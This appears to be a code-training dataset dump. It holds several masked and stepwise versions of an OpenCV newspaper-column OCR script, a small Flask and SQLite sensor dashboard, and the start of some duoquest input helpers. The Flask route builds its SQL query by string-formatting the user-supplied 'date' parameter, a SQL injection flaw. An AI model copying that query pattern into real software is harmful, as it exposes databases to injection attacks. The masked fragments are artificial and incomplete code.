str(abs(\n sorted_data[-1] - sorted_data[0])))\n print('q_exp : ' + str(q_exp))\n return q_exp > conf95_level[min(9, len(sorted_data))]\n\n\nCOLUMNS = 0\nGREEN = 0, 255, 0\nLINE_THICKNESS = 3\nPADDING = 10\nCREATE_COLUMN_OUTLINE_IMAGES = True\n\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = a.size - 2 + 1\n return a[1 * np.arange(nrows)[:, None] + np.arange(2)]\n\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n return temp_img\n\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print('invert image')\n _, temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print('applying dilation morph')\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15)\n \"\"\"\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n \"\"\"\n return temp_img\n\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n sums = np.sum(temp_img, axis=COLUMNS)\n sums[0] = 1000\n sums = sums * -4\n peaks, _ = find_peaks(sums, distance=600)\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n \"\"\"\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n \"\"\"\n print('PeakNum, Sum, QRemove for ' + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print('----------')\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\n 'ERROR: something went wrong with finding the peaks for image: '\n , os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg 0\\n')\n return files\n peaks[0] = 0\n peaks[-1] = sums.size - 1\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print('found image that is causing problems: ', os.path.join(\n directory, basename))\n f.write(os.path.join(directory, basename) + '.jpg ' + str(peaks\n .size) + '\\n')\n columnIndexPairs = columnIndexes(peaks)\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0] - PADDING, 0)\n xend = min(columnIndexPair[1] + PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (\n basename, xstart, xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n print('writing out cropped image: ', filepath)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed, (xstart, ystart), (xend, yend), GREEN,\n LINE_THICKNESS)\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n return files\n\n\ndef invert_experiment():\n test_img = cv2.imread(\n './ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _, temp_img = cv2.threshold(test_img, thresh, 255, cv2.\n THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh=' + str(thresh) + '.jpg',\n temp_img)\n\n\ndef test(img, basename):\n test_img = convertToGrayscale(img)\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n cv2.imwrite('./ocr/test_images/contours/' + basename + 'dilated.jpg',\n test_img)\n \"\"\"\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n \"\"\"\n\n\nif __name__ == '__main__':\n print('STARTING')\n for f in os.listdir('./ocr/data/gb19gw39h/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0],\n './ocr/columns/gb19gw39h/')\n for f in os.listdir('./ocr/data/8k71pf94q/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0],\n './ocr/columns/8k71pf94q/')\n for f in os.listdir('./ocr/data/mc87rq85m/'):\n if f.endswith('.jpg'):\n createColumnImages(cv2.imread(os.path.join(\n './ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0],\n './ocr/columns/mc87rq85m/')\n \"\"\"\n data_folder = './ocr/data/'\n for folder in os.listdir(data_folder):\n if folder == \".DS_Store\":\n continue\n for file in os.listdir(os.path.join(data_folder, folder)):\n if file.endswith(\".jpg\"):\n print(\"calling test() on \" + file)\n #test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])\n createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')\n \n for f in os.listdir('./ocr/data/8k71pr786/'):\n if f.endswith(\".jpg\"):\n for d in range(550, 850, 50):\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)\n #createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')\n \"\"\"\n",
"step-5": "\n# https://github.com/jscancella/NYTribuneOCRExperiments/blob/master/findText_usingSums.py\nimport os\nimport io\nfrom pathlib import Path\nimport sys\nos.environ['OPENCV_IO_ENABLE_JASPER']='True' # has to be set before importing cv2 otherwise it won't read the variable\nimport numpy as np\nimport cv2\n\nimport subprocess\nfrom multiprocessing import Pool\nfrom scipy.signal import find_peaks, find_peaks_cwt\n\nimport scipy.ndimage as ndimage\nfrom IPython.display import Image as KImage\n\n#custom kernel that is used to blend together text in the Y axis\nDILATE_KERNEL = np.array([\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0],\n [0, 0, 0, 0, 1, 0, 0, 0, 0]], dtype=np.uint8)\n\n\n# Run adaptative thresholding (is slow af compared to not using it in pipeline)\ndef adaptative_thresholding(img, threshold):\n # Load image\n I = img\n # Convert image to grayscale\n gray = cv2.cvtColor(I, cv2.COLOR_BGR2GRAY)\n # Original image size\n orignrows, origncols = gray.shape\n # Windows size\n M = int(np.floor(orignrows/16) + 1)\n N = int(np.floor(origncols/16) + 1)\n # Image border padding related to windows size\n Mextend = round(M/2)-1\n Nextend = round(N/2)-1\n # Padding image\n aux =cv2.copyMakeBorder(gray, top=Mextend, bottom=Mextend, left=Nextend,\n right=Nextend, borderType=cv2.BORDER_REFLECT)\n windows = np.zeros((M,N),np.int32)\n # Image integral calculation\n imageIntegral = cv2.integral(aux, windows,-1)\n # Integral image size\n nrows, ncols = imageIntegral.shape\n # Memory allocation for cumulative region image\n result = np.zeros((orignrows, origncols))\n # Image cumulative pixels in windows size calculation\n for i in range(nrows-M):\n for j in range(ncols-N):\n result[i, j] = imageIntegral[i+M, j+N] - imageIntegral[i, j+N]+ imageIntegral[i, j] - imageIntegral[i+M,j]\n\n # Output binary image memory allocation\n binar = np.ones((orignrows, origncols), dtype=np.bool)\n # Gray image weighted by windows size\n graymult = (gray).astype('float64')*M*N\n # Output image binarization\n binar[graymult <= result*(100.0 - threshold)/100.0] = False\n # binary image to UINT8 conversion\n binar = (255*binar).astype(np.uint8)\n\n return binar\n\ndef Q_test(sorted_data):\n conf95_level = {3: .97, 4: .829, 5: .71, 6: .625, 7: .568, 8: .526, 9: .493}\n q_exp = abs(sorted_data[1] - sorted_data[0]) / abs(sorted_data[-1] - sorted_data[0])\n print(str(abs(sorted_data[1] - sorted_data[0])) + ' / ' + str(abs(sorted_data[-1] - sorted_data[0])))\n print(\"q_exp : \" + str(q_exp))\n return q_exp > conf95_level[min(9, len(sorted_data))]\n\n\n# static variables for clarity\nCOLUMNS = 0\nGREEN = (0, 255, 0)\n\n# parameters that can be tweaked\nLINE_THICKNESS = 3 # how thick to make the line around the found contours in the debug output\nPADDING = 10 # padding to add around the found possible column to help account for image skew and such\nCREATE_COLUMN_OUTLINE_IMAGES = True # if we detect that we didn't find all the columns. Create a debug image (tiff) showing the columns that were found\n\ndef columnIndexes(a):\n \"\"\"\n creates pair of indexes for left and right index of the image column\n For example [13, 1257, 2474, 3695, 4907, 6149]\n becomes: [[13 1257], [1257 2474], [2474 3695], [3695 4907], [4907 6149]]\n \"\"\"\n nrows = (a.size-2)+1\n return a[1*np.arange(nrows)[:,None] + np.arange(2)]\n\ndef convertToGrayscale(img):\n temp_img = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n return temp_img\n\ndef invert(img):\n \"\"\" Black -> White | White -> Black \"\"\"\n print(\"invert image\")\n # Should we edit these parameters?\n #3/18/21 - experimented on threshold, 140 is good.\n _,temp_img = cv2.threshold(img, 140, 255, cv2.THRESH_BINARY_INV)\n return temp_img\n\ndef dilateDirection(img, debug=False):\n \"\"\"\n It is just opposite of erosion. Here, a pixel element is '1' if atleast one pixel under the kernel is '1'. \n So it increases the white region in the image or size of foreground object increases. \n Normally, in cases like noise removal, erosion is followed by dilation. \n Because, erosion removes white noises, but it also shrinks our object. \n So we dilate it. Since noise is gone, they won't come back, but our object area increases. \n It is also useful in joining broken parts of an object. \n \"\"\"\n print(\"applying dilation morph\")\n temp_img = cv2.dilate(img, DILATE_KERNEL, iterations=15) #the more iterations the more the text gets stretched in the Y axis, 15 seems about right.\n '''\n if debug:\n filepath = os.path.join(debugOutputDirectory, '%s-dilation.tiff' % basename)\n cv2.imwrite(filepath, temp_img)\n '''\n return temp_img\n\ndef createColumnImages(img, basename, directory):\n \"\"\"\n we sum each column of the inverted image. The columns should show up as peaks in the sums\n uses scipy.signal.find_peaks to find those peaks and use them as column indexes\n \"\"\"\n files = []\n temp_img = convertToGrayscale(img)\n temp_img = invert(temp_img)\n temp_img = dilateDirection(temp_img)\n \n sums = np.sum(temp_img, axis = COLUMNS)\n \n sums[0] = 1000 # some random value so that find_peaks properly detects the peak for the left most column\n sums = sums * -4 # invert so that minimums become maximums and exagerate the data so it is more clear what the peaks are \n peaks, _ = find_peaks(sums, distance=600) # the column indexs of the img array, spaced at least 800 away from the previous peak\n\n sum_to_index = dict((sums[peaks[i]], peaks[i]) for i in range(len(peaks)))\n sorted_sums = sorted(sum_to_index.keys())\n '''\n qr = Q_test(sorted_sums)\n if qr:\n peaks = peaks[peaks != sum_to_index[sorted_sums[0]]]\n '''\n print(\"PeakNum, Sum, QRemove for \" + basename)\n for x in peaks:\n print(str(x) + ', ' + str(sums[x]))\n print(\"----------\")\n\n if peaks.size == 0:\n with open('troublesomeImages.txt', 'a') as f:\n print(\"ERROR: something went wrong with finding the peaks for image: \", os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + \".jpg 0\\n\")\n return files\n\n peaks[0] = 0 # automatically make the left most column index the start of the image\n peaks[-1] =sums.size -1 # automatically make the right most column index the end of the image\n\n boxed = np.copy(img)\n if peaks.size < 6:\n with open('troublesomeImages.txt', 'a') as f:\n print(\"found image that is causing problems: \", os.path.join(directory, basename))\n f.write(os.path.join(directory, basename) + \".jpg \" + str(peaks.size) + \"\\n\")\n\n columnIndexPairs = columnIndexes(peaks)\n\n ystart = 0\n yend = img.shape[0]\n for columnIndexPair in columnIndexPairs:\n xstart = max(columnIndexPair[0]-PADDING, 0)\n xend = min(columnIndexPair[1]+PADDING, img.shape[1])\n if not os.path.exists(directory):\n os.makedirs(directory)\n filepath = os.path.join(directory, '%s_xStart%s_xEnd%s.jpg' % (basename, xstart,xend))\n files.append(filepath)\n crop_img = img[ystart:yend, xstart:xend]\n \n print(\"writing out cropped image: \", filepath)\n # Apply adaptative thresholding to the image with a threshold of 25/100\n #crop_img = adaptative_thresholding(crop_img, 25)\n if not cv2.imwrite(filepath, crop_img):\n print('failed')\n\n if CREATE_COLUMN_OUTLINE_IMAGES:\n cv2.rectangle(boxed,(xstart,ystart),(xend,yend), GREEN, LINE_THICKNESS)\n\n if CREATE_COLUMN_OUTLINE_IMAGES:\n filepath = os.path.join(directory, '%s-contours.jpeg' % basename)\n cv2.imwrite(filepath, boxed, [cv2.IMWRITE_JPEG_QUALITY, 50])\n # For removing the old image?\n # os.remove(os.path.join(directory, basename + \".jp2\"))\n\n return files\n\ndef invert_experiment():\n test_img = cv2.imread('./ocr/data/8k71pf94q/1_commonwealth_8k71pf94q_accessFull.jpg')\n for thresh in range(1, 200, 20):\n print('writing thresh= ' + str(thresh))\n _,temp_img = cv2.threshold(test_img, thresh, 255, cv2.THRESH_BINARY_INV)\n cv2.imwrite('./ocr/test_images/thresh='+str(thresh)+'.jpg', temp_img)\n\n\n\ndef test(img, basename):\n #h, w, _ = img.shape\n #test_img = cv2.imread('./ocr/data/8k71pf94q/2_commonwealth_8k71pf94q_accessFull.jpg')\n test_img = convertToGrayscale(img)\n #ret,test_img = cv2.threshold(test_img,25,255,0)\n #cv2.imwrite('./ocr/test_images/contours/'+basename+'prepixelcrop.jpg', test_img)\n #test_img = test_img[10:h-10, 10: w-10]\n #y_nonzero, x_nonzero = np.nonzero(test_img)\n #test_img = test_img[np.min(y_nonzero):np.max(y_nonzero), np.min(x_nonzero):np.max(x_nonzero)]\n test_img = invert(test_img)\n test_img = dilateDirection(test_img)\n\n #contours,hierarchy = cv2.findContours(test_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n #cnt = contours[0]\n #x,y,w,h = cv2.boundingRect(cnt)\n #test_img = cv2.rectangle(img,(10,10),(w-10, h-10), GREEN, LINE_THICKNESS)\n #test_img = cv2.drawContours(test_img, contours, -1, GREEN, LINE_THICKNESS)\n #crop = test_img[y:y+h,x:x+w]\n cv2.imwrite('./ocr/test_images/contours/'+basename+'dilated.jpg', test_img)\n '''\n for r in range(0, 40, 5):\n name = 'rank=' + str(r) + \".jpg\"\n path = './ocr/test_images/' + name\n\n new_img = ndimage.rank_filter(test_img, rank=r, size=20)\n print(\"writing \" + name)\n cv2.imwrite(path, new_img)\n '''\n #cv2.imwrite('./ocr/test_images/inverted.jpg', test_img)\n\n \n\n\nif __name__ == \"__main__\":\n print(\"STARTING\")\n for f in os.listdir('./ocr/data/gb19gw39h/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0], './ocr/columns/gb19gw39h/')\n\n for f in os.listdir('./ocr/data/8k71pf94q/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pf94q/', f)), '8k71pf94q-' + f[0], './ocr/columns/8k71pf94q/')\n\n for f in os.listdir('./ocr/data/mc87rq85m/'):\n if f.endswith(\".jpg\"):\n #test(cv2.imread(os.path.join('./ocr/data/gb19gw39h/', f)), 'gb19gw39h-' + f[0])\n createColumnImages(cv2.imread(os.path.join('./ocr/data/mc87rq85m/', f)), 'mc87rq85m-' + f[0], './ocr/columns/mc87rq85m/')\n\n '''\n data_folder = './ocr/data/'\n for folder in os.listdir(data_folder):\n if folder == \".DS_Store\":\n continue\n for file in os.listdir(os.path.join(data_folder, folder)):\n if file.endswith(\".jpg\"):\n print(\"calling test() on \" + file)\n #test(cv2.imread(os.path.join(data_folder, folder, file)),folder+'-'+file[0])\n createColumnImages(cv2.imread(os.path.join(data_folder, folder, file)), folder+'-'+file[0], './ocr/columns/'+folder+'/')\n \n for f in os.listdir('./ocr/data/8k71pr786/'):\n if f.endswith(\".jpg\"):\n for d in range(550, 850, 50):\n createColumnImages(cv2.imread(os.path.join('./ocr/data/8k71pr786/', f)), '8k71pr786-'+f[0]+'-d=' + str(d), './ocr/test_images/test_contour/8k71pr786/', d)\n #createColumnImages(cv2.imread('./ocr/data/8k71pr786/'), 'tester2', './ocr/data/columns/tester/')\n '''\n\n",
"step-ids": [
6,
7,
8,
11,
13
]
}
|
[
6,
7,
8,
11,
13
] |
from flask import Flask, request
from flask import render_template
import sqlite3
import datetime
app = Flask(__name__)
@app.route('/')
def index(date = ""):
date = request.args.get('date')
if not date:
now = datetime.datetime.now()
date = "%02d.%02d.%04d" % (now.day, now.month, now.year)
conn = sqlite3.connect("data.db")
c = conn.cursor()
res = c.execute("SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data "
"WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' "
"GROUP BY STRFTIME('%%H', date) " % (date, ))
hour = list()
temp = list()
hum = list()
for row in res:
hour.append(row[0])
temp.append("%.1f" % row[1])
hum.append("%.1f" % row[2])
return render_template('index.html', date = date, hour = hour, temp = temp, hum = hum)
if __name__ == '__main__':
app.debug = True
app.run(host = "127.0.0.1", port = 8888)
|
normal
|
{
"blob_id": "f6fe33e04ccdca1d9714caec412478d0cfc8b363",
"index": 5559,
"step-1": "<mask token>\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-3": "<mask token>\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-4": "from flask import Flask, request\nfrom flask import render_template\nimport sqlite3\nimport datetime\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index(date=''):\n date = request.args.get('date')\n if not date:\n now = datetime.datetime.now()\n date = '%02d.%02d.%04d' % (now.day, now.month, now.year)\n conn = sqlite3.connect('data.db')\n c = conn.cursor()\n res = c.execute(\n \"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' GROUP BY STRFTIME('%%H', date) \"\n % (date,))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append('%.1f' % row[1])\n hum.append('%.1f' % row[2])\n return render_template('index.html', date=date, hour=hour, temp=temp,\n hum=hum)\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='127.0.0.1', port=8888)\n",
"step-5": "from flask import Flask, request\n\nfrom flask import render_template\nimport sqlite3\nimport datetime\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index(date = \"\"):\n date = request.args.get('date')\n\n if not date:\n now = datetime.datetime.now()\n date = \"%02d.%02d.%04d\" % (now.day, now.month, now.year)\n\n conn = sqlite3.connect(\"data.db\")\n c = conn.cursor()\n res = c.execute(\"SELECT STRFTIME('%%H', date), AVG(temp), AVG(hum) FROM data \"\n \"WHERE STRFTIME('%%d.%%m.%%Y', date)='%s' \"\n \"GROUP BY STRFTIME('%%H', date) \" % (date, ))\n hour = list()\n temp = list()\n hum = list()\n for row in res:\n hour.append(row[0])\n temp.append(\"%.1f\" % row[1])\n hum.append(\"%.1f\" % row[2])\n\n return render_template('index.html', date = date, hour = hour, temp = temp, hum = hum)\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host = \"127.0.0.1\", port = 8888)\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Develop(Branch):
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Develop(Branch):
def process(self):
if self.action is Actions.INIT:
self.start_message('Develop Init')
Init(self.state_handler, self.config_handler).process()
else:
raise NotImplementedError
<|reserved_special_token_1|>
from __future__ import annotations
from VersionControl.Branch import Branch
from Branches.Actions.Actions import Actions
from VersionControl.Git.Branches.Develop.Init import Init
class Develop(Branch):
def process(self):
if self.action is Actions.INIT:
self.start_message('Develop Init')
Init(self.state_handler, self.config_handler).process()
else:
raise NotImplementedError
|
flexible
|
{
"blob_id": "338bf2406c233d857e1a688391161d58e1dab23c",
"index": 8910,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Develop(Branch):\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Develop(Branch):\n\n def process(self):\n if self.action is Actions.INIT:\n self.start_message('Develop Init')\n Init(self.state_handler, self.config_handler).process()\n else:\n raise NotImplementedError\n",
"step-4": "from __future__ import annotations\nfrom VersionControl.Branch import Branch\nfrom Branches.Actions.Actions import Actions\nfrom VersionControl.Git.Branches.Develop.Init import Init\n\n\nclass Develop(Branch):\n\n def process(self):\n if self.action is Actions.INIT:\n self.start_message('Develop Init')\n Init(self.state_handler, self.config_handler).process()\n else:\n raise NotImplementedError\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<|reserved_special_token_0|>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
<|reserved_special_token_0|>
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
elif order_input == 'n':
break
else:
print('y/n only!')
return ordered
def input_limit():
limit = None
while True:
limit_input = input('Limit results to n tuples? (int or blank) > ')
if not limit_input:
break
try:
limit = int(limit_input)
break
except Exception as e:
print('int or blank only!')
return limit
def input_tsq_types(num_cols):
while True:
types_input = input('Types (`text` or `number`, comma separated)> ')
types = list(map(lambda x: x.strip(), types_input.split(',')))
if any(map(lambda x: x not in ('text', 'number'), types)):
print('Types must be `text` or `number`')
continue
if len(types) != num_cols:
print('Number of types must match number of columns.')
continue
break
return types
def input_tsq_row_count():
tsq_row_count = 0
while True:
tsq_row_count_input = input('Number of TSQ rows (int) > ')
try:
tsq_row_count = int(tsq_row_count_input)
break
except Exception as e:
print('int only!')
return tsq_row_count
def input_tsq_row(row_num, tsq_types):
while True:
row_input = input(f'Row {row_num} (semicolon-separated values) > ')
tsq_row = list(map(lambda x: x.strip(), row_input.split(';')))
validated = True
for i, cell in enumerate(tsq_row):
if tsq_types[i] == 'number':
try:
float(cell)
except Exception as e:
print('At least one cell value is invalid.')
validated = False
break
if validated:
break
return tsq_row
<|reserved_special_token_0|>
<|reserved_special_token_1|>
import configparser
import sqlite3
import time
import uuid
from duoquest.tsq import TableSketchQuery
def input_db_name(conn):
while True:
db_name = input('Database name (default: concert_singer) > ')
if not db_name:
db_name = 'concert_singer'
cur = conn.cursor()
cur.execute('SELECT 1 FROM databases WHERE name = ?', (db_name,))
if cur.fetchone():
break
else:
print(f'<{db_name}> is not a valid database.')
return db_name
def input_nlq():
nlq = input('NLQ (default: How many singers are there?)> ')
if not nlq:
nlq = 'How many singers are there?'
return nlq
def input_num_cols():
while True:
num_cols = input('Number of columns > ')
try:
num_cols = int(num_cols)
break
except Exception as e:
print('Number of columns should be integer!')
return num_cols
def input_order():
ordered = False
while True:
order_input = input('Should results be ordered? (y/n) > ')
if order_input == 'y':
ordered = True
break
